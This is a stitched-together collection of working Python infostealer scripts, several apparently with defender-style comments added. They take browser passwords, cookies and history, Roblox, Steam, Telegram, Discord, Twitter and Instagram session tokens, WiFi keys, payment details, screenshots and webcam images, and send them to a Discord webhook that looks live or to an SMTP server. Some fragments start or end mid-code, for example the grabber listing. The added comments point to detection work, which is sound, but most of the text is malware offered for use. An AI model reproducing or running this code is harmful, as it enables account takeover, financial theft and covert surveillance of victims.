    The "Network\\Cookies" SQLite file is copied to Temp\\cookie_db, queried,
    and the copy is removed afterwards. Rows with an empty host, name, path
    or encrypted value are skipped.
    """
    cookie_db = f'{path}\\{profile}\\Network\\Cookies'
    if not os.path.exists(cookie_db):
        return
    result = ""
    shutil.copy(cookie_db, user+'\\AppData\\Local\\Temp\\cookie_db')
    conn = sqlite3.connect(user+'\\AppData\\Local\\Temp\\cookie_db')
    cursor = conn.cursor()
    cursor.execute('SELECT host_key, name, path, encrypted_value,expires_utc FROM cookies')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2] or not row[3]:
            continue

        # row[3] is the encrypted cookie value.
        cookie = decrypt_password(row[3], master_key)

        result += f"""
        Host Key : {row[0]}
        Cookie Name : {row[1]}
        Path: {row[2]}
        Cookie: {cookie}
        Expires On: {row[4]}
  
        """

    conn.close()
    os.remove(user+'\\AppData\\Local\\Temp\\cookie_db')
    return result


def get_web_history(path: str, profile: str):
    """Return the profile's browsing history as formatted text, or None if absent.

    The "History" SQLite file is copied to Temp\\web_history_db, queried, and
    the copy is removed afterwards. No decryption is involved.
    """
    web_history_db = f'{path}\\{profile}\\History'
    result = ""
    if not os.path.exists(web_history_db):
        return

    shutil.copy(web_history_db, user+'\\AppData\\Local\\Temp\\web_history_db')
    conn = sqlite3.connect(user+'\\AppData\\Local\\Temp\\web_history_db')
    cursor = conn.cursor()
    cursor.execute('SELECT url, title, last_visit_time FROM urls')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2]:
            continue
        result += f"""
        URL: {row[0]}
        Title: {row[1]}
        Visited Time: {row[2]}
  
        """
    conn.close()
    os.remove(user+'\\AppData\\Local\\Temp\\web_history_db')
    return result


def get_downloads(path: str, profile: str):
    """Read the download records of the profile's "History" database.

    The file is copied to Temp\\downloads_db, queried, and the copy is removed
    afterwards. The formatted text is accumulated in a local variable.
    """
    downloads_db = f'{path}\\{profile}\\History'
    if not os.path.exists(downloads_db):
        return
    result = ""
    shutil.copy(downloads_db, user+'\\AppData\\Local\\Temp\\downloads_db')
    conn = sqlite3.connect(user+'\\AppData\\Local\\Temp\\downloads_db')
    cursor = conn.cursor()
    cursor.execute('SELECT tab_url, target_path FROM downloads')
    for row in cursor.fetchall():
        if not row[0] or not row[1]:
            continue
        result += f"""
        Download URL: {row[0]}
        Local Path: {row[1]}
  
        """

    conn.close()
    os.remove(user+'\\AppData\\Local\\Temp\\downloads_db')


def installed_browsers():
    """Return the labels from ``browsers`` whose "User Data" root exists on disk."""
    results = []
    for browser, path in browsers.items():
        if os.path.exists(path):
            results.append(browser)
    return results


# Entry point. For every browser root found, only the "Default" profile is
# read, and only saved logins and browsing history are written out, as
# Saved_Passwords.txt and Browser_History.txt under Temp\Browser\<browser>.
if __name__ == '__main__':
    available_browsers = installed_browsers()

    for browser in available_browsers:
        browser_path = browsers[browser]
        master_key = get_master_key(browser_path)

        save_results(browser, 'Saved_Passwords', get_login_data(browser_path, "Default", master_key))

        save_results(browser, 'Browser_History', get_web_history(browser_path, "Default"))

roblox.py

Python:
import requests, robloxpy, json, browser_cookie3, os.path

# Profile root used for the temp-file path written later in this script.
user = os.path.expanduser("~")

# Hard-coded upload destination (Discord webhook URL); a network indicator.
hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

def robloxl():
    """Search browser cookie stores for the roblox.com ``.ROBLOSECURITY`` cookie.

    Browsers are tried in a fixed order through browser_cookie3: chrome,
    brave, firefox, chromium, edge, opera. On the first hit the function
    returns ``[cookie_jar, cookie_value]``. Every exception is swallowed, and
    the function returns None implicitly when nothing is found.
    Defender observable: one process opening the cookie stores of several
    different browsers in quick succession.
    """
    data = []

    try:
        cookies = browser_cookie3.chrome(domain_name='roblox.com')
        for cookie in cookies:
            print(cookie)

        # Placed after the loop, so it tests the last cookie iterated.
        if cookie.name == '.ROBLOSECURITY':

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass

    try:

        cookies = browser_cookie3.brave(domain_name='roblox.com')

        for cookie in cookies:

            print(cookie)

            if cookie.name == '.ROBLOSECURITY':

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass

    try:

        cookies = browser_cookie3.firefox(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass

    try:

        cookies = browser_cookie3.chromium(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass



    try:

        cookies = browser_cookie3.edge(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                print("L")

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass



    try:

        cookies = browser_cookie3.opera(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass

# Runs the cookie search at import time; the result is None when no browser
# yielded the cookie.
cookiesrbx = robloxl()



def rbxsteal():
 """Check the harvested cookie, look up account details and send both to the webhook.

 Reads the cookie value from the module-level ``cookiesrbx``, validates it
 through robloxpy, queries roblox.com and robloxpy for account details,
 writes the raw cookie to a text file in the user's Temp directory and then
 issues two POST requests to ``hook``: a JSON embed and the text file.

 Defender notes, all taken from the statements below:
   * host artifact: ``AppData\\Local\\Temp\\cookierbx.txt`` under the profile
     held in ``user``; this function never deletes it;
   * network: an authenticated GET to www.roblox.com/mobileapi/userinfo
     followed by two POSTs to a discord.com/api/webhooks/ URL from a
     Python process.
 ``user``, ``json``, ``requests`` and ``robloxpy`` are defined outside this
 function.
 """

 roblox_cookie = cookiesrbx[1]

 # Validity check delegated to robloxpy; anything other than the literal "Valid Cookie" ends the process.
 isvalid = robloxpy.Utils.CheckCookie(roblox_cookie)

 if isvalid == "Valid Cookie":

    isvalid = "Valid"

 else:

  exit()

 # The cookie is replayed as the session credential for this request.
 ebruh = requests.get("https://www.roblox.com/mobileapi/userinfo",cookies={".ROBLOSECURITY":roblox_cookie})

 info = json.loads(ebruh.text)

 rid = info["UserID"]

 # Further account lookups keyed on the user id, all through robloxpy helpers.
 rap = robloxpy.User.External.GetRAP(rid)

 friends = robloxpy.User.Friends.External.GetCount(rid)

 age = robloxpy.User.External.GetAge(rid)

 dnso = None

 crdate = robloxpy.User.External.CreationDate(rid)

 rolimons = f"https://www.rolimons.com/player/{rid}"

 roblox_profile = f"https://web.roblox.com/users/{rid}/profile"

 headshot = robloxpy.User.External.GetHeadshot(rid)

 limiteds = robloxpy.User.External.GetLimiteds(rid)



 username = info['UserName']

 robux = info['RobuxBalance']

 premium = info['IsPremium']

 # Plaintext copy of the cookie staged on disk; a file-creation event worth hunting for.
 result = open(user + "\\AppData\\Local\\Temp\\cookierbx.txt", "w")

 result.write(cookiesrbx[1])

 result.close()

 # Discord embed body. The fixed title and description strings are usable as content signatures.
 payload = {

    "embeds": [

        {

            "title": "Roblox Stealer!",

            "description": "Github.com/Lawxsz/make-u-own-stealer",

            "fields": [

         {

             "name": "Username",

             "value": username,

             "inline": True

         },

         {

             "name": "Robux Balance",

             "value": robux,

             "inline": True

         },

         {

             "name": "Premium",

             "value": premium,

             "inline": True

         },

         {

             "name": "Builders Club",

             "value": info["IsAnyBuildersClubMember"],

             "inline": True

         },

         {

             "name": "Friends",

             "value": friends,

             "inline": True

         },

         {

             "name": "Profile",

             "value": roblox_profile,

             "inline": True

         },

         {

             "name": "Age",

             "value": crdate,

             "inline": True

         },

            ]

        }

    ]

}

 

 headers = {

    'Content-Type': 'application/json'

}

 file = {"file": open(user+f"\\AppData\\Local\\Temp\\cookierbx.txt", 'rb')}



 # First POST carries the JSON embed, second POST uploads the staged cookie file.
 r = requests.post(hook, data=json.dumps(payload), headers=headers)

 fil = requests.post(hook, files=file)

# Called unconditionally at module level, so simply running or importing the file triggers the whole flow.
rbxsteal()



screenshot.py

Python:
import os.path, requests, os
from PIL import ImageGrab

# Home directory of the current user; used to build the Temp path below.
user = os.path.expanduser("~")

# Upload destination; left empty in this listing.
hook = ""

# Screen capture through PIL.ImageGrab, staged as ss.png in the user's Temp directory.
captura = ImageGrab.grab()
captura.save(user+"\\AppData\\Local\\Temp\\ss.png")

# Multipart upload of the staged image to `hook`.
file = {"file": open(user+"\\AppData\\Local\\Temp\\ss.png", "rb")}
r = requests.post(hook, files=file)
# Best-effort cleanup with errors ignored, so ss.png can remain in Temp as a forensic artifact.
try:
 os.remove(user+"\\AppData\\Local\\Temp\\ss.png")
except:
    pass

steam.py

Python:
import os, os.path, zipfile, requests

# Hard-coded Discord webhook used as the upload destination; the ID/token pair is a network indicator.
hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

steam_path = ""
# Only the default install location under PROGRAMFILES(X86) is probed.
if os.path.exists(os.environ["PROGRAMFILES(X86)"]+"\\steam"):
 steam_path = os.environ["PROGRAMFILES(X86)"]+"\\steam"
 ssfn = []
 config = ""
 # Collects files in the Steam root whose names start with "ssfn".
 for file in os.listdir(steam_path):
     if file[:4] == "ssfn":
         ssfn.append(steam_path+f"\\{file}")
     # Helper: writes every file under `path` plus each entry of `path1` into the open zip `steam_session`.
     def steam(path,path1,steam_session):
            for root,dirs,file_name in os.walk(path):
                for file in file_name:
                    steam_session.write(root+"\\"+file)
            for file2 in path1:
                steam_session.write(file2)
     # The Steam "config" directory and the ssfn files are archived to %TEMP%\steam_session.zip.
     # Defender note: a non-Steam process reading <steam>\config and creating this archive name is the host signal.
     if os.path.exists(steam_path+"\\config"):
      with zipfile.ZipFile(f"{os.environ['TEMP']}\steam_session.zip",'w',zipfile.ZIP_DEFLATED) as zp:
                steam(steam_path+"\\config",ssfn,zp)
# Multipart upload of the archive to the webhook.
file = {"file": open(f"{os.environ['TEMP']}\steam_session.zip", "rb")}
r = requests.post(hook, files=file)
# Best-effort removal of the archive; failures are ignored and would leave it in %TEMP%.
try:
 os.remove(f"{os.environ['TEMP']}\steam_session.zip")
except:
    pass

telegram.py


Python:
py

import os, os.path, shutil, requests
# Home directory of the current user; every path in telegram() is built from it.
user = os.path.expanduser("~")

# Hard-coded Discord webhook used as the upload destination; the ID/token pair is a network indicator.
hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

def telegram():
  """Stage the Telegram Desktop ``tdata`` directory as a zip and post it to ``hook``.

  Does nothing unless ``AppData\\Roaming\\Telegram Desktop\\tdata`` exists
  under the profile in ``user``.

  Defender notes: the statements below name three host artifacts under
  ``AppData\\Local\\Temp``: the directory copy ``tdata_session``, the
  archive ``tdata_session.zip``, and a multipart upload whose filename is
  the archive's full local path. A process other than Telegram reading the
  whole ``tdata`` tree is the earliest observable step.
  """
  if os.path.exists(user+"\\AppData\\Roaming\\Telegram Desktop\\tdata"):
   try:
    # Full copy of the tdata tree into Temp, then a zip archive built from that copy.
    shutil.copytree(user+'\\AppData\\Roaming\\Telegram Desktop\\tdata', user+'\\AppData\\Local\\Temp\\tdata_session')
    shutil.make_archive(user+'\\AppData\\Local\\Temp\\tdata_session', 'zip', user+'\\AppData\\Local\\Temp\\tdata_session')
   except:
    pass
    try:
     os.remove(user+"\\AppData\\Local\\Temp\\tdata_session")
    except:
        pass
    with open(user+'\\AppData\\Local\\Temp\\tdata_session.zip', 'rb') as f:
     payload = {
        'file': (user+'\\AppData\\Local\\Temp\\tdata_session.zip', f, 'zip')
     }
     # Multipart POST of the archive to the webhook; the zip itself is not removed in this function.
     r = requests.post(hook, files=payload)
# Called unconditionally at module level; running or importing the file triggers the collection.
telegram()

webcam.py


Python:
import os.path, os, cv2, requests

# Home directory of the current user; used to build the Temp path below.
user = os.path.expanduser("~")
# Upload destination; left empty in this listing.
hook = ""

# Device index handed to OpenCV's VideoCapture.
camera_port = 0

# Opening the capture device is itself observable: the OS camera-in-use indicator and
# camera access logs apply to this process like any other.
camera = cv2.VideoCapture(camera_port)

# Grabs a single frame.
return_value, image = camera.read()

# Frame staged as temp.png in the user's Temp directory.
cv2.imwrite(user+"\\AppData\\Local\\Temp\\temp.png", image)
del(camera)

file = {"file": open(user+"\\AppData\\Local\\Temp\\temp.png", "rb")}

# Multipart upload of the staged frame to `hook`.
r = requests.post(hook, files=file)
# Best-effort cleanup with errors ignored, so temp.png can remain in Temp as an artifact.
try:
    os.remove(user+"\\AppData\\Local\\Temp\\temp.png")
except:
    pass


sudo apt install python3 && python3-pip
pip3 install smtplib glob

wifi.py


Python:
import os
import smtplib
import subprocess
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import glob

# Name of the plaintext report; it is written to the current working directory.
system_information = "Informations.txt"
var = 2

# SMTP credentials (placeholders in this listing); the original author refers to a README for obtaining them.

# ==============================
# ==============================

YOUR_USERNAME = "YOUR_USERNAME"
YOUR_PASSWORD= "YOUR_PASSWORD"

# ==============================
# ==============================

file_path = os.getcwd()

sender = "Private Person <from@example.com>"
receiver = "A Test User <to@example.com>"

# Mail body prefix. The fixed Subject line and trailer string are usable as mail-gateway content signatures.
message = f"""\
Subject: aydinnyunus have sent you message
To: {receiver}
From: {sender}
WIFI PASSWORD STEALER by aydinnyunus.\n"""


if os.name == "nt":
    # Windows branch. Enumerates saved WLAN profiles by spawning `netsh wlan show profile` through a shell.
    # Defender note: process-creation logging (command line included) captures this and the key=clear call below.
    output = subprocess.check_output("netsh wlan show profile", shell=True)
    output = str(output)
    start = output.find("Profile :")
    end = output.find("\\r\\n")
    substring = output[start:end]
    list_of_word = output.split()
    j = 2
    with open(file_path + "\\" + system_information, "w") as f:
        f.write("All of Registered Connections\n")
        f.write("==================================\n")
        f.close()
    # Whitespace-token parsing of the netsh output to rebuild each profile name.
    for word in output.split():
        if word == "Profile":
            next_word = list_of_word[list_of_word.index(word) + j]
            next_word = next_word.split('\\r\\n')[0]
            k = j + 1
            try:
                while "All" not in next_word:
                    next_word += " " + list_of_word[list_of_word.index(word) + k]
                    k = k + 1
            except:
                pass
            next_word = next_word.split('\\r\\n')[0]
            if ':' in next_word:
                next_word = next_word.split(':')[1]
                if ' ' in next_word:
                    next_word = next_word.replace(' ', "")
            # Per-profile query with key=clear, which asks netsh to print the stored key.
            # A `netsh wlan show profile ... key=clear` command line from a script host is the strongest
            # host indicator in this file and a common detection rule.
            wifi = subprocess.check_output('netsh wlan show profile ' + '"' + next_word + '"' + ' key=clear',
                                           shell=True)
            wifi = str(wifi)
            start = wifi.find("Key Content")
            end = wifi.find("Cost settings")
            key_content = "Content"
            substring = wifi[start:end]
            list_of_words = wifi.split()
            # Profile name appended to the report file.
            with open(file_path + "\\" + system_information, "a") as f:
                f.write(next_word + "\n")
                f.close()
            j = j + 5
            try:
                next_word = list_of_words[list_of_words.index(key_content) + 2]
                i = 2
                for words in wifi.split():
                    if words == "Content":
                        next_word = list_of_words[list_of_words.index(key_content) + i]
                        next_word = next_word.split('\\r\\n\\r\\nCost')[0]
                        next_word = next_word.replace(' ', "\\ ")
                        i = i + 5
                        # Token following "Key Content" appended to the report in plaintext.
                        with open(file_path + "\\" + system_information, "a") as f:
                            f.write(" : " + next_word + "\n")
                            f.close()
            except:
                pass
    # Shell commands that try to terminate and delete something named after this script file.
    # TASKKILL /F and DEL spawned by a script right after netsh activity add to the process-tree signal.
    try:
        pwd = os.path.abspath(os.getcwd())
        os.system("cd " + pwd)
        os.system("TASKKILL /F /IM " + os.path.basename(__file__))
        print('File was closed.')
        os.system("DEL " + os.path.basename(__file__))
    except OSError:
        print('File is close.')

    with open(system_information) as f:
        lines = f.read()

    print(str(lines))
    message += str(lines)

    # Report sent by authenticated SMTP to smtp.mailtrap.io on port 2525.
    # Workstation egress to an external SMTP service on a non-standard port is a network-level detection point.
    with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
        server.login(YOUR_USERNAME, YOUR_PASSWORD)
        server.sendmail(sender, receiver, message)

else:
    # Non-Windows branch.
    #os.system("chmod +x " + os.path.basename(__file__))
    with open(file_path + "/" + system_information, "w") as f:
        f.write("All of Registered Connections\n")
        f.write("==================================\n")
    try:
        # Every file under NetworkManager's system-connections directory is read with `cat` and appended
        # to the report. Auditing read access to that directory covers this step.
        output = glob.glob("/etc/NetworkManager/system-connections/*")

        res = [sub.replace(' ', "\ ") for sub in output]
        for i in res:
            output = subprocess.check_output("cat " + i, shell=True)
            output = str(output)
            with open(file_path + "/" + system_information, "a") as f:
                f.write(output + "\n===========================\n")
    except:
        pass
    try:
        pwd = os.path.abspath(os.getcwd())
        os.system("cd " + pwd)
        os.system('pkill leafpad')
        # Clears the immutable attribute on the script file; the rm that follows is commented out.
        os.system("chattr -i " + os.path.basename(__file__))
        print('File was closed.')
        # os.system("rm -rf " + os.path.basename(__file__))
    except OSError:
        print('File is close.')

    f.close()
    with open(system_information) as f:
        lines = f.read()

    print(str(lines))
    message += str(lines)

    # Same SMTP destination and login as the Windows branch.
    with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
        server.login(YOUR_USERNAME, YOUR_PASSWORD)
        server.sendmail(sender, receiver, message)
 

    #os.system("./" + os.path.basename(_file_))
# The report file is deleted after sending; until then Informations.txt holds the collected data in plaintext.
os.remove("Informations.txt")

minecraft-token-stealer.py

Python:
import json
import os
from urllib.request import Request, urlopen

# your webhook URL
WEBHOOK_URL = "WEBHOOK HERE"

# mentions you when you get a hit
PING_ME = False

def uuid_dashed(uuid):
    """Return *uuid* re-joined with dashes from the slices 0:8, 8:12, 12:16, 16:21 and 21:32."""
    return f"{uuid[0:8]}-{uuid[8:12]}-{uuid[12:16]}-{uuid[16:21]}-{uuid[21:32]}"

def main():
    """Load the ``authenticationDatabase`` section of the Minecraft launcher profile file.

    The listing on this page ends after this one statement, so nothing further
    about the function can be documented from here.

    Defender note: the file read is ``%APPDATA%\\.minecraft\\launcher_profiles.json``;
    access to it by a process other than the launcher is the observable event.
    """
    auth_db = json.loads(open(os.getenv("APPDATA") + "\\.minecraft\\launcher_profiles.json").read())["authenticationDatabase"]

sudo apt install python3 && python3-pip
pip3 install browser_cookie3 browser_history discord_webhook getmac prettytable psutil py_cpuinfo pycountry pycryptodome pywin32 requests pyautogui Pillow

CookedGrabber.py


Python:
lit(' ')[1].split("=")[1]
                        if len(data) > 80:
                            n_lst.append([])
                            for y in c:
                                n_lst[-1].append({'domain': f"{website[3]}", "name": f"{y.split(' ')[1].split('=')[0]}",
                                                 "value": f"{y.split(' ')[1].split('=')[1]}"})
    all_data_p = []
    for x in tokens:
        lst_b = has_payment_methods(x)
        try:
            for n in range(len(lst_b)):
                if lst_b[n]['type'] == 1:
                    writable = [lst_b[n]['brand'], lst_b[n]['type'], lst_b[n]['last_4'], lst_b[n]
                                ['expires_month'], lst_b[n]['expires_year'], lst_b[n]['billing_address']]
                    if writable not in all_data_p:
                        all_data_p.append(writable)
                elif lst_b[n]['type'] == 2:
                    writable_2 = [lst_b[n]['email'], lst_b[n]
                                  ['type'], lst_b[n]['billing_address']]
                    if writable_2 not in all_data_p:
                        all_data_p.append(writable_2)
        except BaseException:
            pass
    return [tokens, list(set(t_lst)), list(set(tuple(element)
                                               for element in insta_lst)), all_data_p, chrome_psw_list, n_lst]


def send_webhook(DISCORD_WEBHOOK_URLs):
    """Collect data through the file's helper functions, zip it and post it to each webhook URL.

    Args:
        DISCORD_WEBHOOK_URLs: iterable of webhook URLs; one message with the
            archive attached is executed per URL.

    The helpers called here (``get_Personal_data``, ``get_cpu_info``,
    ``get_screenshot``, ``main``, ``get_user_data``, ``find_His``, ``gma``,
    ``get_hwid``) are defined outside the visible part of the listing, so
    only their use is described.

    Defender notes, all taken from the statements below:
      * host: a temporary directory is created in the current working
        directory and given the HIDDEN file attribute; inside it the code
        writes "Discord Tokens.txt", "Twitter Tokens.txt",
        "Instagram Tokens.txt", "Chrome Pass.txt", "History.txt",
        "Payment Info.txt", ``netflix_<n>.json`` and ``data.zip``. The
        directory is removed when the ``with`` block exits.
      * network: a GET to restcountries.com and a webhook message sent with
        the username 'Cooked Grabber', the embed title 'New victim !' and
        an attachment named ``Cooked-Grabber-<UserName>.zip``.
    """
    p_lst = get_Personal_data()
    cpuinfo = get_cpu_info()
    with TemporaryDirectory(dir='.') as td:
        # Staging directory is hidden from default Explorer views.
        SetFileAttributes(td, win32con.FILE_ATTRIBUTE_HIDDEN)
        get_screenshot(path=td)
        # main_info is indexed below as: 0 Discord tokens, 1 Twitter tokens, 2 Instagram rows,
        # 3 payment rows, 4 saved-password rows, 5 per-site cookie lists written as netflix_<n>.json.
        main_info = main(td)
        discord_T, twitter_T, insta_T, chrome_Psw_t = (
            PrettyTable(padding_width=1) for _ in range(4))
        discord_T.field_names, twitter_T.field_names, insta_T.field_names, chrome_Psw_t.field_names, verified_tokens = [
            "Discord Tokens", "Username", "Email", "Phone"], ["Twitter Tokens [auth_token]"], ["ds_user_id", "sessionid"], ['Username / Email', 'password', 'website'], []
        for __t in main_info[4]:
            chrome_Psw_t.add_row(__t)
        for t_ in main_info[0]:
            # A token counts as verified only if get_user_data() succeeds for it; failures are skipped silently.
            try:
                lst = get_user_data(t_)
                username, email, phone = f"{lst[0]}#{lst[1]}", lst[2], lst[3]
                discord_T.add_row([t_, username, email, phone])
                verified_tokens.append(t_)
            except BaseException:
                pass
        for _t in main_info[1]:
            twitter_T.add_row([_t])
        for _t_ in main_info[2]:
            insta_T.add_row(_t_)
        pay_l = []
        # Payment rows: element 1 equal to 1 is rendered as a card table, equal to 2 as a PayPal table.
        for _p in main_info[3]:
            if _p[1] == 1:
                payment_card = PrettyTable(padding_width=1)
                payment_card.field_names = [
                    "Brand", "Last 4", "Type", "Expiration", "Billing Adress"]
                payment_card.add_row(
                    [_p[0], _p[2], "Debit or Credit Card", f"{_p[3]}/{_p[4]}", _p[5]])
                pay_l.append(payment_card.get_string())
            elif _p[1] == 2:
                payment_p = PrettyTable(padding_width=1)
                payment_p.field_names = ["Email", "Type", "Billing Adress"]
                payment_p.add_row([_p[0], "Paypal", _p[2]])
                pay_l.append(payment_p.get_string())
        files_names = [[os.path.join(td, "Discord Tokens.txt"), discord_T], [os.path.join(td, "Twitter Tokens.txt"), twitter_T], [
            os.path.join(td, "Instagram Tokens.txt"), insta_T], [os.path.join(td, "Chrome Pass.txt"), chrome_Psw_t]]
        # Each table is written out as plaintext only when its source list is non-empty.
        for x_, y_ in files_names:
            if (y_ == files_names[0][1] and len(main_info[0]) != 0) or (y_ == files_names[1][1] and len(main_info[1]) != 0) or (
                    y_ == files_names[2][1] and len(main_info[2]) != 0) or (y_ == files_names[3][1] and len(main_info[4]) != 0):
                with open(x_, 'w') as wr:
                    wr.write(y_.get_string())
        all_files = [os.path.join(
            td, 'History.txt'), get_screenshot.scrn_path, os.path.join(td, "Payment Info.txt")]
        for n in main_info[5]:
            p = os.path.join(td, f'netflix_{main_info[5].index(n)}.json')
            with open(p, 'w') as f:
                f.write(dumps(n, indent=4))
            all_files.append(p)
        with open(all_files[0], 'w') as f:
            f.write(find_His())
        # Everything staged above is bundled into data.zip inside the hidden directory.
        with ZipFile(os.path.join(td, 'data.zip'), mode='w', compression=ZIP_DEFLATED) as zip:
            if ('payment_card' or 'payment_p') in locals():
                with open(all_files[2], 'w') as f:
                    for i in pay_l:
                        f.write(f"{i}\n")
            for files_path in all_files:
                try:
                    zip.write(files_path)
                except FileNotFoundError:
                    pass
            for name_f, _ in files_names:
                if os.path.exists(name_f):
                    zip.write(name_f)
        for URL in DISCORD_WEBHOOK_URLs:
            # Fixed webhook username and avatar URL: both are content indicators for this family.
            webhook = DiscordWebhook(url=URL, username='Cooked Grabber',
                                     avatar_url="https://i.postimg.cc/FRdZ5DJV/discord-avatar-128-ABF2-E.png")
            embed = DiscordEmbed(title='New victim !', color='FFA500')
            embed.add_embed_field(
                name='SYSTEM USER INFO', value=f":pushpin:`PC Username:` **{os.getenv('UserName')}**\n:computer:`PC Name:` **{os.getenv('COMPUTERNAME')}**\n:globe_with_meridians:`OS:` **{platform()}**\n", inline=False)
            # Building this field performs an outbound GET to restcountries.com with the country name in the path.
            embed.add_embed_field(
                name='IP USER INFO', value=f":eyes:`IP:` **{p_lst[0]}**\n:golf:`Country:` **{p_lst[1]}** :flag_{get(f'https://restcountries.com/v3/name/{p_lst[1]}').json()[0]['cca2'].lower()}:\n:cityscape:`City:` **{p_lst[2]}**\n:shield:`MAC:` **{gma()}**\n:wrench:`HWID:` **{get_hwid()}**\n", inline=False)
            embed.add_embed_field(
                name='PC USER COMPONENT', value=f":satellite_orbital:`CPU:` **{cpuinfo['brand_raw']} - {round(float(cpuinfo['hz_advertised_friendly'].split(' ')[0]), 2)} GHz**\n:nut_and_bolt:`RAM:` **{round(virtual_memory().total / (1024.0 ** 3), 2)} GB**\n:desktop:`Resolution:` **{GetSystemMetrics(0)}x{GetSystemMetrics(1)}**\n", inline=False)
            embed.add_embed_field(
                name='ACCOUNT GRABBED', value=f":red_circle:`Discord:` **{len(verified_tokens)}**\n:purple_circle:`Twitter:` **{len(main_info[1])}**\n:blue_circle:`Instagram:` **{len(main_info[2])}**\n:green_circle:`Netflix:` **{len(main_info[5])}**\n:brown_circle:`Account Password Grabbed:` **{len(main_info[4])}**\n", inline=False)
            card_e, paypal_e = ":white_check_mark:" if 'payment_card' in locals(
            ) else ":x:", ":white_check_mark:" if 'payment_p' in locals() else ":x:"
            embed.add_embed_field(
                name='PAYMENT INFO FOUNDED', value=f":credit_card:`Debit or Credit Card:` {card_e}\n:money_with_wings:`Paypal:` {paypal_e}", inline=False)
            embed.set_footer(text='By Lemon.-_-.#3714 & cr4sh3d.py#2160')
            embed.set_timestamp()
            # The archive is attached under a name that embeds the local Windows user name.
            with open(os.path.join(td, "data.zip"), 'rb') as f:
                webhook.add_file(
                    file=f.read(), filename=f"Cooked-Grabber-{os.getenv('UserName')}.zip")
            webhook.add_embed(embed)
            webhook.execute()


if __name__ == "__main__":
    # freeze_support() is presumably multiprocessing's helper for frozen Windows executables,
    # which would suggest the script is meant to be packaged; its import is not visible here.
    freeze_support()
    # With no arguments the placeholder string is used; otherwise every command-line argument
    # is treated as a webhook URL.
    if len(sys.argv) == 1:
        send_webhook(['YOUR DISCORD WEBHOOK URL'])
    else:
        del sys.argv[0]
        send_webhook(sys.argv)

sudo apt install python3 && python3-pip
pip3 install pypiwin32 pycryptodome

chromium_based_browsers.py


Python:
import os
import json
import base64
import sqlite3
from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES
import shutil
from datetime import datetime

# Per-user base directory (LOCALAPPDATA) under which every profile path below is built.
appdata = os.getenv('LOCALAPPDATA')

# Name -> "User Data" directory for 16 Chromium-family browsers.
# Defender note: this table doubles as a list of paths to cover with file-access auditing,
# alerting when a process other than the owning browser opens files beneath them.
browsers = {
    'amigo': appdata + '\\Amigo\\User Data',
    'torch': appdata + '\\Torch\\User Data',
    'kometa': appdata + '\\Kometa\\User Data',
    'orbitum': appdata + '\\Orbitum\\User Data',
    'cent-browser': appdata + '\\CentBrowser\\User Data',
    '7star': appdata + '\\7Star\\7Star\\User Data',
    'sputnik': appdata + '\\Sputnik\\Sputnik\\User Data',
    'vivaldi': appdata + '\\Vivaldi\\User Data',
    'google-chrome-sxs': appdata + '\\Google\\Chrome SxS\\User Data',
    'google-chrome': appdata + '\\Google\\Chrome\\User Data',
    'epic-privacy-browser': appdata + '\\Epic Privacy Browser\\User Data',
    'microsoft-edge': appdata + '\\Microsoft\\Edge\\User Data',
    'uran': appdata + '\\uCozMedia\\Uran\\User Data',
    'yandex': appdata + '\\Yandex\\YandexBrowser\\User Data',
    'brave': appdata + '\\BraveSoftware\\Brave-Browser\\User Data',
    'iridium': appdata + '\\Iridium\\User Data',
}


def get_master_key(path: str):
    """Return the browser's unwrapped ``os_crypt`` key, or None when it is unavailable.

    Args:
        path: a browser "User Data" directory.

    Returns None if *path* does not exist or the ``Local State`` file does
    not contain the text ``os_crypt``. Otherwise reads
    ``os_crypt.encrypted_key`` from ``Local State``, base64-decodes it,
    drops the first five bytes and passes the rest to ``CryptUnprotectData``.

    Defender notes: the two observable steps are a non-browser process
    reading ``<User Data>\\Local State`` and a DPAPI unprotect call made
    from that same process. Because the key is unwrapped with the logged-in
    user's DPAPI context, any code running as that user can perform this
    step; the control that matters is preventing untrusted code execution
    in the user session.
    """
    if not os.path.exists(path):
        return

    if 'os_crypt' not in open(path + "\\Local State", 'r', encoding='utf-8').read():
        return

    with open(path + "\\Local State", "r", encoding="utf-8") as f:
        c = f.read()
    local_state = json.loads(c)

    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_password(buff: bytes, master_key: bytes) -> str:
    """Decrypt one stored value with AES-GCM and return it as text.

    Args:
        buff: the encrypted blob as read from the browser database.
        master_key: the key returned by ``get_master_key``.

    Bytes 3..14 of *buff* are used as the nonce and everything from byte 15
    on as the ciphertext. ``decrypt`` is called without a verify step, and
    the last 16 bytes of the output (presumably the GCM tag) are discarded
    before decoding. Exceptions are not caught here.
    """
    iv = buff[3:15]
    payload = buff[15:]
    cipher = AES.new(master_key, AES.MODE_GCM, iv)
    decrypted_pass = cipher.decrypt(payload)
    decrypted_pass = decrypted_pass[:-16].decode()

    return decrypted_pass


def save_results(browser_name, data_type, content):
